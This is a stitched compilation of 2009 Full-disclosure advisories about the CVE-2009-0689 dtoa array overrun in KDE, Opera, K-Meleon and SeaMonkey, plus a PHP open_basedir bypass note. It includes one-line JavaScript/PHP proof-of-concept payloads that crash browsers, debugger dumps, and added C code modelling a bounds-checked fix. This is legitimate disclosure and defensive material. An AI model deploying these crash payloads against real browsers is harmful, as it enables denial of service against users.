ds             0x23     35
es             0x23     35
fs             0x3b     59
gs             0x0      0

(gdb) x/i 0x67c68740
0x67c68740 :
mov    0x67ce0458(,%edi,4),%eax
(gdb) x/x $eax
0x964619c7:     Cannot access memory at address 0x964619c7


--- 3. SecurityReason Note ---
Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- Flock

This list is not yet closed.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.or

[Full-disclosure] PHP 5.3.1 open_basedir bypass

2009-12-04 Thread Maksymilian Arciemowicz
hi,

In the PHP 5.3.1 security changelog we can read that the safe_mode bypass in
tempnam() has already been fixed. But safe_mode in the 5.3 line is
deprecated. We can understand a security fix for the open_basedir bypass, but
not for safe_mode in 5.3.
Annoying is the fact that an exploit to bypass open_basedir or safe_mode
in PHP 5.3.1 is available at

http://securityreason.com/achievement_exploitalert/14

We can use the symlink trick like in

http://securityreason.com/achievement_securityalert/70

The issue has been reported to PHP, but did not obtain a meaningful
response.
A very similar issue was reported in October 2006 by Stefan Esser
(SREASON:1692)

http://securityreason.com/securityalert/1692

This issue has been fixed.
The small difference with this one is that we need to create a fake
directory structure.

-- 
Best Regards,

pub   1024D/A6986BD6 2008-08-22
uid  Maksymilian Arciemowicz (cxib)

sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg




[Full-disclosure] SecurityReason: KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)

2009-11-19 Thread Maksymilian Arciemowicz

[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- KDELibs 4.3.3

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/74


--- 0.Description ---
KDELibs is a collection of libraries built on top of Qt that provides
frameworks and functionality for developers of KDE-compatible software.
The KDELibs libraries are licensed under LGPL.


--- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code
execution) ---
The main problem exists in the dtoa implementation. KDE has a very similar
dtoa algorithm to the BSD, Chrome and Mozilla products. The problem exists
in the dtoa.cpp file

http://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup

and it is the same as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar ones is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can create a float of any length, which will overwrite the memory.
Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and
it is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept (PoC) ---

---

var a=0.<?php echo str_repeat("9",29); ?>;

---

If we use konqueror to see this PoC, konqueror will crash. For example:

---

var a=0.<?php echo str_repeat("1",296450); ?>;

---

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 24845, thread 0x7e6e6800]
0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0

0x06db85c3 :    mov    %esi,(%ecx)

#0  0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0
#1  0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0
#2  0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0
#3  0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0
#4  0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0
#5  0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0
#6  0x0908337f in KJS::InterpreterImp::evaluate ()

(gdb) i r
eax            0x0      0
ecx            0x220ff000       571469824
edx            0x0      0
ebx            0x220fbb00       571456256
esp            0xcfbc04e0       0xcfbc04e0
ebp            0xcfbc0518       0xcfbc0518
esi            0xc71c71c7       -954437177
edi            0x0      0
eip            0x21415c3        0x21415c3

esi=0x71c71c7


--- 3. SecurityReason Note ---

Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed. US-CERT declared that it would inform all
vendors about this issue; however, they did not do it. Even greater
confusion was caused by the new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like (KDE, Chrome)
and it is based on "CVE-2009-0689". After some time the Mozilla Foundation
Security Advisory
(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)
was updated with the note:
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact (a new CVE number for the Firefox vulnerability) and the PoC in
JavaScript (from Secunia) forced us to officially notify all other
vendors. We publish all the individual advisories to formally show all
vulnerable software and to avoid wrong CVE numbers. We do not see any
other way to fix this issue in all products.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
htt

[Full-disclosure] SecurityReason: Opera 10.01 Remote Array Overrun (Arbitrary code execution)

2009-11-19 Thread Maksymilian Arciemowicz

[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- Opera 10.01
- Opera 10.10 Beta

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/73


--- 0.Description ---
Opera is a Web browser and Internet suite developed by the Opera
Software company. The browser handles common Internet-related tasks such
as displaying Web sites, sending and receiving e-mail messages, managing
contacts, IRC online chatting, downloading files via BitTorrent, and
reading Web feeds. Opera is offered free of charge for personal
computers and mobile phones.


--- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Opera has a very similar
dtoa algorithm to the BSD, Chrome and Mozilla products. It is the same
issue as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar ones is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can create a float of any length, which will overwrite the memory.
Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and it
is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept (PoC) ---

---

var a=0.<?php echo str_repeat("9",29); ?>;

---

If we use Opera to see this PoC, Opera will crash. For example:

---

var a=0.<?php echo str_repeat("1",296450); ?>;

---

OPERA-CRASHLOG V1 desktop 10.01 1844 windows
Opera.exe 1844 caused exception C005 at address 67956906 (Base: 40)

Registers:
EAX=01165C40   EBX=0592064C   ECX=A0D589D4   EDX=4200   ESI=C20471EC
EDI=   EBP=0012E384   ESP=0012E2FC   EIP=67956906 FLAGS=00010202
CS=001B   DS=0023   SS=0023   ES=0023   FS=003B   GS=
FPU stack:
C020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800
3FC78000 1001 0BBE0004
 2EBA804E2FDE SW=0122 CW=027F

127# gdb -q opera opera.core
...
Program terminated with signal 11, Segmentation fault.
#0  0x2960307b in ?? ()
...
(gdb) i r
eax            0x71c71c71       1908874353
ecx            0x2aa03be4       715144164
edx            0x0      0
ebx            0x296177f8       694253560
esp            0xbfbfb650       0xbfbfb650
ebp            0xbfbfb698       0xbfbfb698
esi            0x2962d000       694341632
edi            0x0      0
eip            0x2960307b       0x2960307b
...
(gdb) x/100x ($esi)-90
0x2962cfa6: 0x71c71c71  0x1c71c71c  0xc71c71c7  0x71c71c71
0x2962cfb6: 0x1c71c71c  0xc71c71c7  0x71c71c71  0x1c71c71c
0x2962cfc6: 0xc71c71c7  0x71c71c71  0x1c71c71c  0xc71c71c7
0x2962cfd6: 0x71c71c71  0x1c71c71c  0xc71c71c7  0x71c71c71
0x2962cfe6: 0x1c71c71c  0xc71c71c7  0x71c71c71  0x1c71c71c
0x2962cff6: 0xc71c71c7  0x71c71c71  Cannot access memory at
address 0x2962cffe
...


--- 3. SecurityReason Note ---

Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed. US-CERT declared that it would inform all
vendors about this issue; however, they did not do it. Even greater
confusion was caused by the new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like (KDE, Chrome)
and it is based on "CVE-2009-0689". After some time the Mozilla Foundation
Security Advisory
(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)
was updated with the note:
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact (a new CVE number for the Firefox vulnerability) and the PoC in
JavaScript (from Secunia) forced us to officially notify all other
vendors. We publish all the individual advisories to formally show all
vulnerable software and to avoid wrong CVE numbers. We do not see any
other way to fix this issue in all products.


--- 4. Fix ---
Opera fix:
The vulnerability was fixed in the latest release candidate Opera RC3:
http://snapshot.opera.com/windows/Opera_1010_1890_in.exe
In a short time we can expect the final version of Opera with the fix.

NetBSD fix (optimal):
http://cvsweb.netbsd.org/b

[Full-disclosure] SecurityReason: K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution)

2009-11-19 Thread Maksymilian Arciemowicz

[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- K-Meleon 1.5.3

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/72


--- 0.Description ---
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also used
by Firefox. K-Meleon is free, open source software released under the
GNU General Public License and is designed specifically for Microsoft
Windows (Win32) operating systems.


--- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. K-Meleon has the same
dtoa as KDE, Opera and all BSD systems. This issue has been fixed in
Firefox 3.5.4 and the fix

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar ones is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can create a float of any length, which will overwrite the memory.
Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and it
is possible to access elements >= 16 of the freelist array.


--- 2. Proof of Concept (PoC) ---

---

var a=0.<?php echo str_repeat("1",296450); ?>;

---

K-Meleon will crash with

Unhandled exception at 0x01800754 in k-meleon.exe: 0xC005: Access
violation reading location 0x0bc576ec.

01800754  mov eax,dword ptr [ecx]

EAX 0002
ECX 0BC576EC
EDI 028FEB51


--- 3. SecurityReason Note ---

Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed. US-CERT declared that it would inform all
vendors about this issue; however, they did not do it. Even greater
confusion was caused by the new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like (KDE, Chrome)
and it is based on "CVE-2009-0689". After some time the Mozilla Foundation
Security Advisory
(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)
was updated with the note:
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact (a new CVE number for the Firefox vulnerability) and the PoC in
JavaScript (from Secunia) forced us to officially notify all other
vendors. We publish all the individual advisories to formally show all
vulnerable software and to avoid wrong CVE numbers. We do not see any
other way to fix this issue in all products.

Please note:
The patch used in Firefox 3.5.4 does not fully solve the problem. The dtoa
algorithm is not optimal and allows a remote Denial of Service in Firefox
3.5.5 when given a long float number.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://w
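
The Kmax overrun that section 1 of each advisory above describes, as an added example that is not code from the advisories or from any vendor's fix: a small C model of dtoa's Balloc()/Bfree() freelist with the bounds check the advisories say is missing, plus the digit-to-bucket arithmetic (my own estimate from log2(10) and 32-bit words) showing why a 296450-digit literal lands in bucket 15 and a product of two such values needs bucket 16. The names other than Kmax, freelist and Bigint, and the exact allocator layout, are assumptions.

```c
/* Added example, not from the advisory: a minimal model of dtoa's Balloc()
 * freelist and the Kmax bounds check that the vulnerable code lacked.
 * Names other than Kmax/freelist/Bigint and the layout are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

#define Kmax 15                        /* advisory: Kmax is defined as 15 */

typedef struct Bigint {
    struct Bigint *next;
    int k;                             /* bucket: capacity is 1 << k words */
    int maxwds;
    int sign, wds;
    uint32_t x[1];                     /* trailing array of 32-bit words */
} Bigint;

static Bigint *freelist[Kmax + 1];     /* indices 0..Kmax are the only valid ones */

/* log2(10) scaled by 1e9, so the digit-to-bit estimate stays in integers. */
#define LOG2_10_E9 3321928095LL

/* Number of 32-bit words needed to hold an integer with ndigits decimal digits. */
long words_for_digits(long ndigits) {
    long long bits = (ndigits * LOG2_10_E9 + 999999999LL) / 1000000000LL;
    return (long)((bits + 31) / 32);
}

/* Smallest k with (1 << k) >= words: the freelist bucket dtoa would ask for. */
int k_for_words(long words) {
    int k = 0;
    while ((1L << k) < words) k++;
    return k;
}

/* A product of two bucket-k Bigints can need twice the words, i.e. bucket k+1. */
int k_for_product_of_digits(long ndigits) {
    return k_for_words(words_for_digits(ndigits)) + 1;
}

/* 1 if indexing freelist[k] would read or write past the array. */
int overruns_freelist(int k) {
    return k < 0 || k > Kmax;
}

/* Hardened allocator: touch freelist[] only when k is in range; larger
 * requests go straight to malloc and carry their k so bfree can tell. */
Bigint *balloc_checked(int k) {
    Bigint *rv = NULL;
    if (k < 0) return NULL;
    if (!overruns_freelist(k) && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;        /* reuse a cached block of this size */
    } else {
        long x = 1L << k;
        size_t len = sizeof(Bigint) + (size_t)(x - 1) * sizeof(uint32_t);
        rv = malloc(len);
        if (rv == NULL) return NULL;
        rv->k = k;
        rv->maxwds = (int)x;
    }
    rv->next = NULL;
    rv->sign = rv->wds = 0;
    return rv;
}

/* Matching release: oversize blocks never enter the bounded freelist. */
void bfree_checked(Bigint *v) {
    if (v == NULL) return;
    if (overruns_freelist(v->k)) {     /* no bucket for this size: free it */
        free(v);
        return;
    }
    v->next = freelist[v->k];
    freelist[v->k] = v;
}

int main(void) {
    long nd = 296450;                  /* digit count used in the PoCs above */
    long words = words_for_digits(nd);
    int k = k_for_words(words);
    printf("%ld digits -> %ld words -> bucket k=%d; a product needs k=%d (Kmax=%d)\n",
           nd, words, k, k + 1, Kmax);
    Bigint *b = balloc_checked(k + 1);
    printf("k=%d: freelist index out of range? %s; allocation %s\n", k + 1,
           overruns_freelist(k + 1) ? "yes" : "no", b ? "ok" : "failed");
    bfree_checked(b);
    return 0;
}
```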

[Full-disclosure] SecurityReason: SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution)

2009-11-19 Thread Maksymilian Arciemowicz

[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- SeaMonkey 1.1.18

Fixed in:
- SeaMonkey 2.0

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/71


--- 0.Description ---
The SeaMonkey project is a community effort to develop the SeaMonkey
all-in-one internet application suite (see below). Such a software suite
was previously made popular by Netscape and Mozilla, and the SeaMonkey
project continues to develop and deliver high-quality updates to this
concept. Containing an Internet browser, email & newsgroup client with
an included web feed reader, HTML editor, IRC chat and web development
tools, SeaMonkey is sure to appeal to advanced users, web developers and
corporate users.


- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code
execution) ---
The main problem exists in the dtoa implementation. SeaMonkey has the
same dtoa as KDE, Opera and all BSD systems. This issue has been fixed
in Firefox 3.5.4, and the fix

http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42

has been used to patch SeaMonkey 2.0.

This flaw was detected in May 2009 and signed SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar systems is in
SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create a float with any number of digits, which will overwrite
memory. Kmax is defined as 15. Functions in dtoa don't check the Kmax
limit, and it is possible to reference elements 16 and above of the
freelist array.


- --- 2. Proof of Concept  (PoC) ---

- ---

var a=0.<?php echo str_repeat("9",29); ?>;

- ---

If we use SeaMonkey to see this PoC, SeaMonkey will crash. For example

- ---

var a=0.<?php echo str_repeat("1",296450); ?>;

- ---

127# gdb seamonkey-bin seamonkey-bin.core
...
#0  0x28df0ecb in ?? ()
...
(gdb) i r
eax            0x0        0
ecx            0x2        2
edx            0xbfbfd2fc -1077947652
ebx            0x28da9b6c 685415276
esp            0xbfbfd2ac 0xbfbfd2ac
ebp            0xbfbfd2c8 0xbfbfd2c8
esi            0xb        11
edi            0xb        11
eip            0x28df0ecb 0x28df0ecb
...

esi = edi = 11


- --- 3. SecurityReason Note ---

Officially SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon

This list is not yet closed. US-CERT declared that it would inform all
vendors about this issue; however, they did not do it. Even greater
confusion was caused by the new CVE number "CVE-2009-1563". Secunia
informed that this vulnerability was only detected in Mozilla Firefox,
but nobody was aware that the problem affects other products (KDE,
Chrome) and that it is based on "CVE-2009-0689". After some time the
Mozilla Foundation Security Advisory
("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html")
was updated with the note:
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact (a new CVE number for the Firefox vulnerability) and the PoC
in JavaScript (from Secunia) forced us to officially notify all other
vendors. We publish all the individual advisories to formally show all
vulnerable software and to avoid a wrong CVE number. We do not see any
other way to fix this issue in all products.

Please note:
The patch used in Firefox 3.5.4 does not fully solve the problem. The
dtoa algorithm is not optimal and allows remote Denial of Service in
Firefox 3.5.5 when given a long float number.


- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/s
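
The Kmax overrun described in section 1, as an added example that is not code from SeaMonkey, Mozilla or the gdtoa sources: a cut-down model of gdtoa's Balloc()/Bfree() freelist, with the size-class computation that dtoa's s2b() applies to a digit string, the unchecked index as the advisory describes it, and a bound that keeps large size classes out of the freelist. The names Balloc, Bfree, Kmax and the Bigint fields follow dtoa; k_for_digits(), balloc_unchecked_overruns() and cached_after_free() are this example's own helpers, and the bounded version is one possible fix, not necessarily the patch any vendor shipped.

```c
#include <stdio.h>
#include <stdlib.h>

#define Kmax 15                         /* last valid freelist index, as in dtoa */

typedef struct Bigint {
    struct Bigint *next;
    int k;                              /* size class: 1 << k payload words */
    int maxwds;
    unsigned x[1];
} Bigint;

static Bigint *freelist[Kmax + 1];

/* dtoa's s2b() chooses the size class from the digit count: one 32-bit
 * word per 9 decimal digits, rounded up to a power of two (copied here). */
int k_for_digits(int ndigits)
{
    int x = (ndigits + 8) / 9, k = 0, y = 1;
    while (x > y) { y <<= 1; k++; }
    return k;
}

/* The unchecked shape the advisory describes: freelist[k] used with no
 * test that k <= Kmax. Reports whether that access would leave the array
 * (the real code would read and write there; this model does not). */
int balloc_unchecked_overruns(int k)
{
    return k > Kmax;
}

/* Balloc with the bound: classes the freelist cannot index go straight
 * to malloc(). */
Bigint *Balloc(int k)
{
    Bigint *rv;
    if (k <= Kmax && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;         /* recycle a cached block */
        return rv;
    }
    int x = 1 << k;
    rv = malloc(sizeof(Bigint) + (size_t)(x - 1) * sizeof(unsigned));
    if (rv == NULL) return NULL;
    rv->k = k;
    rv->maxwds = x;
    return rv;
}

/* Bfree with the matching bound: never cache what Balloc cannot index. */
void Bfree(Bigint *v)
{
    if (v == NULL) return;
    if (v->k > Kmax) {
        free(v);
    } else {
        v->next = freelist[v->k];
        freelist[v->k] = v;
    }
}

/* Blocks sitting in freelist[k] after one Balloc/Bfree pair: 1 for a
 * cacheable class, 0 for a class the list has no slot for. */
int cached_after_free(int k)
{
    Bigint *b = Balloc(k);
    if (b == NULL) return -1;
    Bfree(b);
    if (k > Kmax) return 0;
    int n = 0;
    for (Bigint *p = freelist[k]; p != NULL; p = p->next) n++;
    return n;
}

int main(void)
{
    int k = k_for_digits(296450);       /* digit count of the second PoC above */
    printf("296450 digits -> k=%d, unchecked freelist[%d] %s\n", k, k,
           balloc_unchecked_overruns(k) ? "overruns (Kmax=15)" : "is in range");
    printf("cached after free: k=3 -> %d, k=16 -> %d\n",
           cached_after_free(3), cached_after_free(16));
    return 0;
}
```

For the 296450-digit PoC, k_for_digits() gives 16, one past the last freelist slot, which is exactly the index the unchecked code would use; with the bound, Balloc(16) is served by malloc() directly and Bfree() never stores it back into the array.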

[Full-disclosure] PHP 5.2.11/5.3.0 Multiple Vulnerabilities

2009-11-13 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.10.2009
- - Pub.: 13.11.2009

Risk: Medium

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11

Original URL:
http://securityreason.com/achievement_securityalert/70

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
